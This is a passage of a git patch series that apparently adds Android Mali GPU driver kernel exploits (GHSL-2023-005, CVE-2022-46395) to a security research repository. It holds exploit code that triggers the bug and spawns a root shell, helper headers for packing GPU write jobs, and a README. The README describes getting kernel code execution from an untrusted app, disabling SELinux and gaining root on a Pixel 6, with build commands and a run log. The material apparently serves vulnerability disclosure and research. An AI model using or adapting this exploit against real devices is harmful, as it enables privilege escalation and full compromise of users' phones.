+ * reserved regions later receive the shellcode writes, then run one exploit
+ * attempt; trigger() == 0 means we are root and SELinux is off, so spawn a
+ * shell. */
+int main() {
+  setbuf(stdout, NULL);
+  setbuf(stderr, NULL);
+
+  select_offset();
+
+  int mali_fd2 = open_dev(MALI);
+  setup_mali(mali_fd2, 1);
+  setup_tracking_page(mali_fd2);
+  reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+  map_gpu(mali_fd2, 1, 1, false, 0);
+  if (!trigger(mali_fd2)) {
+    system("sh");
+  }
+}
+#else
+#include <jni.h>
+/* JNI entry point (app build): same flow as the SHELL main(), but reports
+ * success by returning 0 and logging the (now root) uid/euid rather than
+ * spawning a shell. Returns -1 when the single attempt fails. */
+JNIEXPORT int JNICALL
+Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz)
+{
+  setbuf(stdout, NULL);
+  setbuf(stderr, NULL);
+  select_offset();
+
+  int mali_fd2 = open_dev(MALI);
+  setup_mali(mali_fd2, 1);
+  setup_tracking_page(mali_fd2);
+  reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+  map_gpu(mali_fd2, 1, 1, false, 0);
+  if (!trigger(mali_fd2)) {
+    LOG("uid: %d euid %d", getuid(), geteuid());
+    return 0;
+  }
+  return -1;
+}
+#endif
+
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h b/SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h
new file mode 100644
index 0000000..e0ce432
--- /dev/null
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h
@@ -0,0 +1,260 @@
+#ifndef MIDGARD_H
+#define MIDGARD_H
+
+//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
+
+#include <stdio.h>
+#include <stdint.h>
+#include <stdbool.h>
+#include <assert.h>
+#include <math.h>
+#include <inttypes.h>
+#include <string.h>
+
/*
 * pan_section_ptr: address of section S inside a packed job descriptor of
 * type A, using the generated MALI_<A>_SECTION_<S>_OFFSET constant.
 */
#define pan_section_ptr(base, A, S) \
        ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET))

/*
 * pan_section_pack: for-loop trick that declares a section struct `name`
 * pre-initialised with the generated _header defaults, lets the loop body
 * run exactly once so the caller can fill in fields, then packs `name`
 * into `dst` via the ({ ... }) increment expression. `_loop_terminate`
 * exists only to terminate the loop after one iteration (set to NULL in
 * the increment; the condition tests it against NULL).
 */
#define pan_section_pack(dst, A, S, name) \
   for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \
        *_loop_terminate = (void *) (dst); \
        __builtin_expect(_loop_terminate != NULL, 1); \
        ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \
           _loop_terminate = NULL; }))
+
+
/*
 * Shift a field value into bit positions [start, end] of a descriptor word.
 * Debug builds assert that the value fits in the field's width; the shift
 * itself is all that is needed at runtime.
 */
static inline uint64_t
__gen_uint(uint64_t v, uint32_t start, uint32_t end)
{
#ifndef NDEBUG
   const int nbits = end - start + 1;

   if (nbits < 64)
      assert(v <= (1ull << nbits) - 1);
#endif

   return v << start;
}
+
/*
 * Read the little-endian bit field [start, end] back out of a byte stream.
 * Gathers every byte the field touches into a 64-bit word, then shifts the
 * field down to bit 0 and masks off anything beyond its width.
 */
static inline uint64_t
__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end)
{
   const int nbits = end - start + 1;
   const uint64_t mask = (nbits == 64) ? ~0ull : (1ull << nbits) - 1;
   const uint32_t first_byte = start / 8;
   const uint32_t last_byte = end / 8;
   uint64_t word = 0;

   for (uint32_t b = first_byte; b <= last_byte; b++)
      word |= (uint64_t)cl[b] << ((b - first_byte) * 8);

   return (word >> (start % 8)) & mask;
}
+
/*
 * Job descriptor types accepted by the Midgard job manager; value 0 doubles
 * as the "no job / not started" marker. Stored in bits 1..7 of word 4 of the
 * job header (see MALI_JOB_HEADER_pack below).
 */
enum mali_job_type {
   MALI_JOB_TYPE_NOT_STARTED = 0,
   MALI_JOB_TYPE_NULL = 1,
   MALI_JOB_TYPE_WRITE_VALUE = 2,
   MALI_JOB_TYPE_CACHE_FLUSH = 3,
   MALI_JOB_TYPE_COMPUTE = 4,
   MALI_JOB_TYPE_VERTEX = 5,
   MALI_JOB_TYPE_GEOMETRY = 6,
   MALI_JOB_TYPE_TILER = 7,
   MALI_JOB_TYPE_FUSED = 8,
   MALI_JOB_TYPE_FRAGMENT = 9,
};
+
/*
 * What a WRITE_VALUE job writes to its target address. Note there is no
 * value 0; the _as_str helper treats anything outside 1..7 as invalid.
 */
enum mali_write_value_type {
   MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1,
   MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2,
   MALI_WRITE_VALUE_TYPE_ZERO = 3,
   MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4,
   MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5,
   MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6,
   MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7,
};
+
+
/*
 * Unpacked form of a WRITE_VALUE job payload: write `immediate_value`
 * (interpreted per `type`) to GPU address `address`. Packed layout is
 * defined by MALI_WRITE_VALUE_JOB_PAYLOAD_pack below (24 bytes).
 */
struct MALI_WRITE_VALUE_JOB_PAYLOAD {
   uint64_t address;
   enum mali_write_value_type type;
   uint64_t immediate_value;
};
+
/*
 * Unpacked form of the 32-byte header that precedes every job payload.
 * Exact bit positions are defined by MALI_JOB_HEADER_pack below; of note,
 * `index` is a 16-bit job slot index, `dependency_1`/`dependency_2` are
 * 16-bit indices of jobs this one waits on, and `next` is the 64-bit GPU
 * address of the next job in the chain (0 terminates).
 */
struct MALI_JOB_HEADER {
   uint32_t exception_status;
   uint32_t first_incomplete_task;
   uint64_t fault_pointer;
   bool is_64b;
   enum mali_job_type type;
   bool barrier;
   bool invalidate_cache;
   bool suppress_prefetch;
   bool enable_texture_mapper;
   bool relax_dependency_1;
   bool relax_dependency_2;
   uint32_t index;
   uint32_t dependency_1;
   uint32_t dependency_2;
   uint64_t next;
};
+
+
/*
 * Serialise a MALI_JOB_HEADER into its hardware layout: eight little-endian
 * 32-bit words (32 bytes). The 64-bit fields (fault_pointer, next) are split
 * low-half-first across two consecutive words. Bits 10 and 13 of word 4 are
 * intentionally never written (see the must-be-zero check in _unpack).
 */
static inline void
MALI_JOB_HEADER_pack(uint32_t * restrict cl,
                     const struct MALI_JOB_HEADER * restrict values)
{
   cl[ 0] = __gen_uint(values->exception_status, 0, 31);
   cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31);
   cl[ 2] = __gen_uint(values->fault_pointer, 0, 63);
   cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32;
   cl[ 4] = __gen_uint(values->is_64b, 0, 0) |
            __gen_uint(values->type, 1, 7) |
            __gen_uint(values->barrier, 8, 8) |
            __gen_uint(values->invalidate_cache, 9, 9) |
            __gen_uint(values->suppress_prefetch, 11, 11) |
            __gen_uint(values->enable_texture_mapper, 12, 12) |
            __gen_uint(values->relax_dependency_1, 14, 14) |
            __gen_uint(values->relax_dependency_2, 15, 15) |
            __gen_uint(values->index, 16, 31);
   cl[ 5] = __gen_uint(values->dependency_1, 0, 15) |
            __gen_uint(values->dependency_2, 16, 31);
   cl[ 6] = __gen_uint(values->next, 0, 63);
   cl[ 7] = __gen_uint(values->next, 0, 63) >> 32;
}
+
+
#define MALI_JOB_HEADER_LENGTH 32   /* packed size in bytes (8 x 32-bit words) */
/* Opaque packed representation; same 32 bytes the hardware reads. */
struct mali_job_header_packed { uint32_t opaque[8]; };
/*
 * Inverse of MALI_JOB_HEADER_pack: decode the packed bit stream back into
 * the unpacked struct. Bit offsets below are absolute (word*32 + bit).
 */
static inline void
MALI_JOB_HEADER_unpack(const uint8_t * restrict cl,
                       struct MALI_JOB_HEADER * restrict values)
{
   /* 0x2400 = bits 10 and 13 of word 4 -- exactly the two bits _pack never
    * sets; warn if a descriptor has them on. */
   if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n");
   values->exception_status = __gen_unpack_uint(cl, 0, 31);
   values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63);
   values->fault_pointer = __gen_unpack_uint(cl, 64, 127);
   values->is_64b = __gen_unpack_uint(cl, 128, 128);
   values->type = __gen_unpack_uint(cl, 129, 135);
   values->barrier = __gen_unpack_uint(cl, 136, 136);
   values->invalidate_cache = __gen_unpack_uint(cl, 137, 137);
   values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139);
   values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140);
   values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142);
   values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143);
   values->index = __gen_unpack_uint(cl, 144, 159);
   values->dependency_1 = __gen_unpack_uint(cl, 160, 175);
   values->dependency_2 = __gen_unpack_uint(cl, 176, 191);
   values->next = __gen_unpack_uint(cl, 192, 255);
}
+
+static inline const char *
+mali_job_type_as_str(enum mali_job_type imm)
+{
+ switch (imm) {
+ case MALI_JOB_TYPE_NOT_STARTED: return "Not started";
+ case MALI_JOB_TYPE_NULL: return "Null";
+ case MALI_JOB_TYPE_WRITE_VALUE: return "Write value";
+ case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush";
+ case MALI_JOB_TYPE_COMPUTE: return "Compute";
+ case MALI_JOB_TYPE_VERTEX: return "Vertex";
+ case MALI_JOB_TYPE_GEOMETRY: return "Geometry";
+ case MALI_JOB_TYPE_TILER: return "Tiler";
+ case MALI_JOB_TYPE_FUSED: return "Fused";
+ case MALI_JOB_TYPE_FRAGMENT: return "Fragment";
+ default: return "XXX: INVALID";
+ }
+}
+
/*
 * Dump an unpacked job header to `fp`, one field per line, each line
 * left-padded with `indent` spaces (via the %*s trick).
 */
static inline void
MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent)
{
   fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status);
   fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task);
   fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer);
   fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false");
   fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type));
   fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false");
   fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false");
   fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false");
   fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false");
   fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false");
   fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false");
   fprintf(fp, "%*sIndex: %u\n", indent, "", values->index);
   fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1);
   fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2);
   fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next);
}
+
/*
 * Serialise a WRITE_VALUE payload into six little-endian 32-bit words
 * (24 bytes): address in words 0/1, type in word 2, word 3 must be zero,
 * immediate value in words 4/5.
 */
static inline void
MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl,
                                  const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
{
   cl[ 0] = __gen_uint(values->address, 0, 63);
   cl[ 1] = __gen_uint(values->address, 0, 63) >> 32;
   cl[ 2] = __gen_uint(values->type, 0, 31);
   cl[ 3] = 0;
   cl[ 4] = __gen_uint(values->immediate_value, 0, 63);
   cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32;
}


#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24   /* packed size in bytes */
#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0    /* no non-zero defaults */


/* Opaque packed representation of the payload. */
struct mali_write_value_job_payload_packed { uint32_t opaque[6]; };
/*
 * Inverse of MALI_WRITE_VALUE_JOB_PAYLOAD_pack; warns if the must-be-zero
 * word 3 carries any bits. Bit offsets are absolute (word*32 + bit).
 */
static inline void
MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl,
                                    struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
{
   if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n");
   values->address = __gen_unpack_uint(cl, 0, 63);
   values->type = __gen_unpack_uint(cl, 64, 95);
   values->immediate_value = __gen_unpack_uint(cl, 128, 191);
}
+
+static inline const char *
+mali_write_value_type_as_str(enum mali_write_value_type imm)
+{
+ switch (imm) {
+ case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter";
+ case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp";
+ case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64";
+ default: return "XXX: INVALID";
+ }
+}
+
/* Dump an unpacked WRITE_VALUE payload to `fp`, indented like _JOB_HEADER_print. */
static inline void
MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent)
{
   fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address);
   fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type));
   fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value);
}
+
/* Complete packed WRITE_VALUE job: 32-byte header + 24-byte payload = 56 bytes. */
struct mali_write_value_job_packed {
   uint32_t opaque[14];
};

/* Default header field values applied by pan_section_pack. */
#define MALI_JOB_HEADER_header \
   .is_64b = true

/*
 * Section glue: these aliases let the generic pan_section_ptr/pan_section_pack
 * macros address the HEADER (offset 0) and PAYLOAD (offset 32) sections of a
 * WRITE_VALUE job by token pasting.
 */
#define MALI_WRITE_VALUE_JOB_LENGTH 56
#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER
#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header
#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack
#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack
#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print
#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0
#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD
#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header
#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack
#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack
#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print
#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32
+
+#endif
From 2c1e4be2af5336fd6d90658feff3c2fd855e8353 Mon Sep 17 00:00:00 2001
From: Man Yue Mo
Date: Fri, 24 Feb 2023 15:14:18 +0000
Subject: [PATCH 09/53] Initial commit
---
.../Android/Mali/CVE_2022_46395/README.md | 54 +
.../Android/Mali/CVE_2022_46395/log_utils.h | 11 +
.../Android/Mali/CVE_2022_46395/mali.h | 1060 ++++++++++++++
.../Mali/CVE_2022_46395/mali_base_jm_kernel.h | 1220 +++++++++++++++++
.../Mali/CVE_2022_46395/mali_user_buf.c | 670 +++++++++
.../Android/Mali/CVE_2022_46395/mem_write.c | 160 +++
.../Android/Mali/CVE_2022_46395/mem_write.h | 27 +
.../Mali/CVE_2022_46395/mempool_utils.c | 61 +
.../Mali/CVE_2022_46395/mempool_utils.h | 19 +
.../Android/Mali/CVE_2022_46395/midgard.h | 260 ++++
10 files changed, 3542 insertions(+)
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/README.md
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mali.h
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/README.md b/SecurityExploits/Android/Mali/CVE_2022_46395/README.md
new file mode 100644
index 0000000..6cafc1a
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/README.md
@@ -0,0 +1,54 @@
+## Exploit for CVE-2022-46395
+
+The write-up can be found [here](https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug/). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+
+The exploit is tested on the Google Pixel 6 with the November 2022 and January 2023 patch. For reference, I used the following command to compile with clang in ndk-21:
+
+```
+android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o mali_user_buf
+```
+
+The exploit should be run a couple of minutes after boot and is likely to have to run for a few minutes to succeed. It is not uncommon to fail the race condition hundreds of times, although failing the race condition does not have any ill effect and the exploit as a whole rarely crashes. If successful, it should disable SELinux and gain root.
+
+```
+oriole:/ $ /data/local/tmp/mali_user_buf
+fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
+benchmark_time 357
+failed after 100
+failed after 200
+failed after 300
+benchmark_time 343
+failed after 400
+failed after 500
+failed after 600
+benchmark_time 337
+failed after 700
+failed after 800
+failed after 900
+benchmark_time 334
+failed after 1000
+failed after 1100
+failed after 1200
+benchmark_time 363
+failed after 1300
+finished reset: 190027720 fault: 135735849 772 err 0 read 3
+found pgd at page 4
+overwrite addr : 76f6100710 710
+overwrite addr : 76f5f00710 710
+overwrite addr : 76f6100710 710
+overwrite addr : 76f5f00710 710
+overwrite addr : 76f5d00710 710
+overwrite addr : 76f5b00710 710
+overwrite addr : 76f5d00710 710
+overwrite addr : 76f5b00710 710
+overwrite addr : 76f6100fd4 fd4
+overwrite addr : 76f5f00fd4 fd4
+overwrite addr : 76f6100fd4 fd4
+overwrite addr : 76f5f00fd4 fd4
+overwrite addr : 76f5d00fd4 fd4
+overwrite addr : 76f5b00fd4 fd4
+overwrite addr : 76f5d00fd4 fd4
+overwrite addr : 76f5b00fd4 fd4
+result 50
+oriole:/ #
+```
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h b/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h
new file mode 100644
index 0000000..0a4172c
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h
@@ -0,0 +1,11 @@
+#ifndef LOG_UTILS_H
+#define LOG_UTILS_H
+
+#ifdef SHELL
+#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
+#else
+#include
+#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
+#endif
+
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mali.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mali.h
new file mode 100644
index 0000000..3b61e20
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mali.h
@@ -0,0 +1,1060 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_KBASE_JM_IOCTL_H_
+#define _UAPI_KBASE_JM_IOCTL_H_
+
+#include <asm/ioctl.h>
+#include <linux/types.h>
+
+/*
+ * 11.1:
+ * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags
+ * 11.2:
+ * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED,
+ * which some user-side clients prior to 11.2 might fault if they received
+ * them
+ * 11.3:
+ * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and
+ * KBASE_IOCTL_STICKY_RESOURCE_UNMAP
+ * 11.4:
+ * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET
+ * 11.5:
+ * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD)
+ * 11.6:
+ * - Added flags field to base_jit_alloc_info structure, which can be used to
+ * specify pseudo chunked tiler alignment for JIT allocations.
+ * 11.7:
+ * - Removed UMP support
+ * 11.8:
+ * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags
+ * 11.9:
+ * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY
+ * under base_mem_alloc_flags
+ * 11.10:
+ * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for
+ * JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations
+ * with one softjob.
+ * 11.11:
+ * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags
+ * 11.12:
+ * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS
+ * 11.13:
+ * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT
+ * 11.14:
+ * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set
+ * under base_mem_alloc_flags
+ * 11.15:
+ * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags.
+ * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be
+ * passed to mmap().
+ * 11.16:
+ * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf.
+ * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for
+ * dma-buf. Now, buffers are mapped on GPU when first imported, no longer
+ * requiring external resource or sticky resource tracking. UNLESS,
+ * CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled.
+ * 11.17:
+ * - Added BASE_JD_REQ_JOB_SLOT.
+ * - Reused padding field in base_jd_atom_v2 to pass job slot number.
+ * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO
+ * 11.18:
+ * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags
+ * 11.19:
+ * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified.
+ * 11.20:
+ * - Added new phys_pages member to kbase_ioctl_mem_jit_init for
+ * KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2
+ * (replacing '_OLD') and _11_5 suffixes
+ * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in
+ * base_jd_atom_v2. It must currently be initialized to zero.
+ * - Added heap_info_gpu_addr to base_jit_alloc_info, and
+ * BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's
+ * flags member. Previous variants of this structure are kept and given _10_2
+ * and _11_5 suffixes.
+ * - The above changes are checked for safe values in usual builds
+ * 11.21:
+ * - v2.0 of mali_trace debugfs file, which now versions the file separately
+ * 11.22:
+ * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2.
+ * KBASE_IOCTL_JOB_SUBMIT supports both in parallel.
+ * 11.23:
+ * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify
+ * the physical memory backing of JIT allocations. This was not supposed
+ * to be a valid use case, but it was allowed by the previous implementation.
+ * 11.24:
+ * - Added a sysfs file 'serialize_jobs' inside a new sub-directory
+ * 'scheduling'.
+ * 11.25:
+ * - Enabled JIT pressure limit in base/kbase by default
+ * 11.26
+ * - Added kinstr_jm API
+ * 11.27
+ * - Backwards compatible extension to HWC ioctl.
+ * 11.28:
+ * - Added kernel side cache ops needed hint
+ * 11.29:
+ * - Reserve ioctl 52
+ * 11.30:
+ * - Add a new priority level BASE_JD_PRIO_REALTIME
+ * - Add ioctl 54: This controls the priority setting.
+ * 11.31:
+ * - Added BASE_JD_REQ_LIMITED_CORE_MASK.
+ * - Added ioctl 55: set_limited_core_count.
+ */
+#define BASE_UK_VERSION_MAJOR 11
+#define BASE_UK_VERSION_MINOR 31
+
/**
 * struct kbase_ioctl_version_check - Check version compatibility between
 * kernel and userspace
 *
 * @major: Major version number
 * @minor: Minor version number
 */
struct kbase_ioctl_version_check {
	__u16 major;
	__u16 minor;
};

/* Command 0 on the KBASE ioctl magic (see KBASE_IOCTL_TYPE below; macros
 * expand at the point of use, so the later definition is fine). */
#define KBASE_IOCTL_VERSION_CHECK \
	_IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check)


/**
 * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel
 *
 * @addr: Memory address of an array of struct base_jd_atom_v2 or v3
 * @nr_atoms: Number of entries in the array
 * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom)
 */
struct kbase_ioctl_job_submit {
	__u64 addr;
	__u32 nr_atoms;
	__u32 stride;
};

#define KBASE_IOCTL_JOB_SUBMIT \
	_IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit)

#define KBASE_IOCTL_POST_TERM \
	_IO(KBASE_IOCTL_TYPE, 4)

/**
 * struct kbase_ioctl_soft_event_update - Update the status of a soft-event
 * @event: GPU address of the event which has been updated
 * @new_status: The new status to set
 * @flags: Flags for future expansion
 */
struct kbase_ioctl_soft_event_update {
	__u64 event;
	__u32 new_status;
	__u32 flags;
};

#define KBASE_IOCTL_SOFT_EVENT_UPDATE \
	_IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update)

/**
 * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for
 * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the
 * kernel
 *
 * @size: The size of the `struct kbase_kinstr_jm_atom_state_change`
 * @version: Represents a breaking change in the
 * `struct kbase_kinstr_jm_atom_state_change`
 * @padding: Explicit padding to get the structure up to 64bits. See
 * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
 *
 * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the
 * end of the structure that older user space might not understand. If the
 * `version` is the same, the structure is still compatible with newer kernels.
 * The `size` can be used to cast the opaque memory returned from the kernel.
 */
struct kbase_kinstr_jm_fd_out {
	__u16 size;
	__u8 version;
	__u8 padding[5];
};

/**
 * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor
 *
 * @count: Number of atom states that can be stored in the kernel circular
 * buffer. Must be a power of two
 * @padding: Explicit padding to get the structure up to 64bits. See
 * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
 */
struct kbase_kinstr_jm_fd_in {
	__u16 count;
	__u8 padding[6];
};

union kbase_kinstr_jm_fd {
	struct kbase_kinstr_jm_fd_in in;
	struct kbase_kinstr_jm_fd_out out;
};

#define KBASE_IOCTL_KINSTR_JM_FD \
	_IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd)


#define KBASE_IOCTL_VERSION_CHECK_RESERVED \
	_IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check)

/* Magic/type byte shared by every KBASE ioctl in this header; the second
 * argument of each _IO* macro is the command number on this magic. */
#define KBASE_IOCTL_TYPE 0x80
+
/**
 * struct kbase_ioctl_set_flags - Set kernel context creation flags
 *
